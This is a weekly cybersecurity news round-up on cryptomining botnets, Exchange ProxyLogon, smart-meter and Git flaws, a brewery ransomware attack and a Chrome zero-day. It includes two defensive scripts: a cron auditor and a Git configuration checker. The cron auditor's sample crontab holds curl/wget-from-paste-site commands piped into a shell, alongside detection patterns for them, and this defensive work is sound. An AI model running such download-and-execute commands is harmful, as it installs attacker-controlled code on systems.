by Richard Beck

Here is our cyber security news round-up of the week:

Crypto-mining botnet targets unpatched vulnerabilities in cloud servers

Attackers frequently upgrade their tools to scan for and infect new devices by exploiting unpatched vulnerabilities. Recently, the z0Miner cryptomining malware was spotted probing cloud servers with a new set of exploits for unpatched vulnerabilities: an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE affecting Jenkins servers.

After compromising a server, the malware first downloads a malicious shell script and installs a cron entry that periodically fetches and executes further malicious scripts from Pastebin. The botnet then downloads a mining kit containing an XMRig miner script (java.exe), a configuration file (config.json) and a starter script (solr.sh), and begins mining Monero (XMR) cryptocurrency in the background.

According to the Tencent Security Team, z0Miner was actively exploiting two Weblogic pre-auth RCE bugs tracked as CVE-2020-14882 and CVE-2020-14883 to spread to other devices. In addition, the botnet was seen spreading laterally on the network of already compromised devices via SSH.
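The persistence mechanism described above (a cron entry that pulls and runs scripts from a paste site, plus the named mining-kit files) is something a defender can audit for on a Linux host. The following is an added example, not code from the original article or from any vendor; the sample crontab lines and the placeholder paste ids are constructed, and the generic `paste.<host>` pattern is an assumption added to catch look-alike paste services.

```python
"""Cron audit for the z0Miner-style persistence described above.

Added example, not code from the original article or from any vendor.
It flags cron lines that fetch payloads from paste sites, pipe downloaded
content straight into a shell, or reference the mining-kit artifact names
the article mentions (java.exe, config.json, solr.sh). The crontab text
below is constructed for illustration; the placeholder paste ids are fake.
"""
import re
from dataclasses import dataclass, field

# pastebin.com comes from the article; the generic 'paste.<host>' form is an
# assumption added to catch look-alike paste services.
PASTE_HOST_RE = re.compile(r"https?://(?:[\w.-]*pastebin\.com|paste\.[\w.-]+)/", re.I)
# Download-and-execute idiom: curl/wget output piped into sh or bash.
FETCH_EXEC_RE = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b", re.I)
# File names from the article's description of the downloaded mining kit.
ARTIFACT_NAMES = ("java.exe", "config.json", "solr.sh", "xmrig")


@dataclass
class Finding:
    line_no: int
    line: str
    reasons: list = field(default_factory=list)


def audit_crontab(text: str) -> list:
    """Return a Finding for every non-comment cron line that looks suspicious."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if PASTE_HOST_RE.search(line):
            reasons.append("fetches content from a paste site")
        if FETCH_EXEC_RE.search(line):
            reasons.append("pipes a download straight into a shell")
        hits = [name for name in ARTIFACT_NAMES if name in line.lower()]
        if hits:
            reasons.append("references mining-kit artifact(s): " + ", ".join(hits))
        if reasons:
            findings.append(Finding(line_no, line, reasons))
    return findings


# Constructed sample: three benign entries and three modelled on the
# behaviour described in the article.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * curl -s https://pastebin.com/raw/PLACEHOLDER_ID | sh
@reboot /tmp/.cache/solr.sh
*/5 * * * * wget -q -O- http://paste.example.net/raw/PLACEHOLDER_ID | bash
30 4 * * 0 /usr/local/bin/backup.sh
"""


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.line}")
        for r in f.reasons:
            print(f"    - {r}")
```

Run it against the output of `crontab -l` for each user and the files under `/etc/cron.d` to get a list of entries worth a closer look; a hit on the artifact names alone is a weak signal, while a paste-site fetch piped into a shell is rarely legitimate.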

Continued exploitation of Microsoft Exchange Servers

A bug referred to as ProxyLogon is one of four Microsoft Exchange zero-days that Microsoft patched in an out-of-band release on 3 March 2021. It is part of the Hafnium attack, and sysadmins are advised to update on-premises and hosted Exchange deployments per Microsoft's guidance, and also to run Microsoft Safety Scanner, Microsoft's malware discovery tool.

Since Microsoft disclosed ongoing attacks using ProxyLogon exploits last week, Slovak internet security firm ESET has spotted at least ten APT groups targeting unpatched Exchange servers. ESET also detected PowerShell downloaders being deployed on multiple email servers via attack infrastructure previously linked to the DLTMiner coin-mining campaign.

A (mostly) working ProxyLogon proof-of-concept exploit was shared earlier this week by a security researcher and later removed. According to Palo Alto Networks telemetry, more than 125,000 Exchange servers worldwide still await patching. Tens of thousands of organisations have already been compromised in ongoing attacks exploiting the ProxyLogon flaws, which began at least as early as January, two months before Microsoft started releasing patches. The vulnerabilities are tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.

Schneider PowerLogic smart meters vulnerable

Industrial cybersecurity firm Claroty this week disclosed technical details for two potentially serious vulnerabilities affecting PowerLogic smart meters made by Schneider Electric. PowerLogic is a line of revenue and power quality meters that are used not only by utilities, but also industrial companies, healthcare organisations and data centers for monitoring electrical networks. Researchers at Claroty discovered that some of the PowerLogic ION and PM series smart meters are affected by vulnerabilities that can be exploited remotely by an unauthenticated attacker by sending specially crafted TCP packets to the targeted device.

“These smart meters communicate using a proprietary ION protocol over TCP port 7700, and packets received by the device are parsed by a state machine function,” Claroty explained in a blog post. “We found that it is possible to trigger the flaw during the packet-parsing process by the main state machine function by sending a crafted request. This can be done without authentication because the request is fully parsed before it is handled or authentication is checked.”

Claroty said its researchers identified two different exploitation paths – depending on the architecture of the targeted device – and two different CVE identifiers have been assigned. One of them, CVE-2021-22714, is considered critical as it allows an attacker to cause the targeted meter to reboot (i.e. a DoS condition) and possibly even to execute arbitrary code. The other, CVE-2021-22713, can only be exploited to force the device to reboot and has been assigned a high severity rating. Users of the affected Schneider Electric products should apply the patches or mitigations to prevent potential attacks, particularly now that information about the flaws has been made public.

Git vulnerability could enable remote code execution attacks during clone process

The Git Project has patched a vulnerability that could result in remote code execution. The bug – tracked as CVE-2021-21300 – is present in several versions of the open source code management system, and could allow a hostile remote repository to execute code locally during a clone operation. Crucially, the vulnerability only affects users on case-insensitive filesystems with support for symbolic links enabled. A clean/smudge filter such as Git LFS must also be configured for the attack to work.

A security advisory reads: “In affected versions of Git, a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS).”

The release fixes the bug in versions 2.17.6 through to 2.30.2. Git users often clone an existing repository for various reasons, such as building on a fully-fledged copy from elsewhere or keeping a copy of their project in case the server disk is corrupted. Since the RCE vulnerability only affects case-insensitive filesystems, not all Git users are exposed. Other operating systems such as Linux – which is case-sensitive by default – are presumed to be safe, although users should still exercise caution.
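The two preconditions named above (symbolic-link support enabled and a clean/smudge filter such as Git LFS configured) can be checked in a client's gitconfig before a clone is run, and the Git advisory's workarounds for unpatched clients are exactly to disable one of them (`core.symlinks false`) or remove the other. The script below is an added example, not code from the Git project: it parses a gitconfig file with a small hand-written parser and reports whether both preconditions are present. The sample configurations are constructed, and whether the filesystem is case-insensitive is passed in by the caller, since the script does not probe the disk.

```python
"""Check a Git configuration for the CVE-2021-21300 preconditions.

Added example, not code from the Git project. The Git advisory names two
workarounds for unpatched clients: disable symbolic-link support
(core.symlinks=false) or have no clean/smudge filter (such as Git LFS)
configured before cloning. This script parses a gitconfig file and reports
whether both attack preconditions are still present. The sample configs are
constructed for illustration; whether the filesystem is case-insensitive is
passed in by the caller, since the script does not probe the disk.
"""
import re

SECTION_RE = re.compile(r'^\[([^\s"\]]+)(?:\s+"([^"]*)")?\]$')
FALSE_VALUES = ("false", "0", "no", "off")


def parse_gitconfig(text: str) -> dict:
    """Flatten gitconfig text into {'section.subsection.key': value}.

    Handles the common [section] and [section "sub"] forms and '#'/';'
    comment lines; quoted values containing '#' are not special-cased.
    """
    entries = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            name, sub = m.group(1).lower(), m.group(2)
            section = f"{name}.{sub}" if sub is not None else name
            continue
        if section is None:
            continue  # a key outside any section is not valid gitconfig
        if "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
        else:
            key, value = line, "true"  # a bare key means boolean true
        entries[f"{section}.{key.lower()}"] = value
    return entries


def assess_cve_2021_21300(entries: dict, case_insensitive_fs: bool = True) -> dict:
    """Report whether the advisory's attack preconditions hold for this config."""
    # An absent core.symlinks is treated as enabled (conservative assumption).
    symlinks_enabled = entries.get("core.symlinks", "true").lower() not in FALSE_VALUES
    filters = sorted({
        key[len("filter."):].rsplit(".", 1)[0]
        for key in entries
        if key.startswith("filter.") and key.endswith((".clean", ".smudge"))
    })
    exposed = case_insensitive_fs and symlinks_enabled and bool(filters)
    advice = []
    if exposed:
        advice.append("git config --global core.symlinks false")
        advice.append("or remove the clean/smudge filter(s) until Git is updated")
    return {
        "symlinks_enabled": symlinks_enabled,
        "filters": filters,
        "exposed": exposed,
        "advice": advice,
    }


# Constructed sample: a typical Git LFS setup with symlinks left enabled.
EXPOSED_CONFIG = """\
[user]
    name = Example User
[filter "lfs"]
    clean = git-lfs clean -- %f
    smudge = git-lfs smudge -- %f
    process = git-lfs filter-process
    required = true
"""

# The same config with the advisory's core.symlinks workaround applied.
HARDENED_CONFIG = EXPOSED_CONFIG + "[core]\n    symlinks = false\n"


if __name__ == "__main__":
    for label, cfg in (("exposed", EXPOSED_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, assess_cve_2021_21300(parse_gitconfig(cfg)))
```

Point it at `~/.gitconfig` (the global config, which is what applies before a clone) on Windows and macOS machines to find users who still need the update or one of the workarounds; on a case-sensitive Linux filesystem pass `case_insensitive_fs=False` and the check reports no exposure, matching the advisory.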

Molson Coors Brewery crippled by cyber attack

A cyber attack hit Molson Coors breweries in the US, leaving the company unable to produce beer at this time. Molson Coors has a huge portfolio of beer brands, including the well-known Coors and Miller brands, as well as Molson Canadian, Blue Moon, Peroni, Grolsch, Killian’s and Foster’s. Representatives of Molson Coors gave only a few details, but cybersecurity experts say this type of attack is becoming all too familiar. The company acknowledged “a systems outage” caused by a “cybersecurity incident” that led to delays or disruptions to brewery operations, production and shipments.

“The Company is working around the clock to get its systems back up as quickly as possible,” Miller Coors wrote in the filing. “Although the Company is actively managing this cybersecurity incident, it has caused and may continue to cause a delay or disruption to parts of the Company’s business, including its brewery operations, production, and shipments.”

So far, the incident appears to be a ransomware attack. Cybersecurity experts are urging companies to keep backups of their data on physical, offline drives so that, when an incident of this type occurs, they are not at the mercy of ransomware.

Google fixes the third actively exploited Chrome zero-day since January

Google has fixed a new zero-day flaw in its Chrome browser that is being actively exploited in the wild, the second within a month. The flaw, tracked as CVE-2021-21193, is a use-after-free vulnerability in the Blink rendering engine. Google addressed the issue in version 89.0.4389.90 for Windows, Mac and Linux, which will roll out over the coming days. The flaw was reported to Google by an anonymous researcher on 9 March; at the time of writing, the company had not released details of the vulnerability, to prevent other threat actors from exploiting it in the wild.

This update includes five security fixes contributed by external researchers. In early February, Google addressed another actively exploited zero-day vulnerability, tracked as CVE-2021-21148, with the release of Chrome 88.0.4324.150. That vulnerability is a heap buffer overflow in V8, the open-source high-performance JavaScript and WebAssembly engine written in C++.

Edited and compiled by QA's Director of Cyber, Richard Beck.
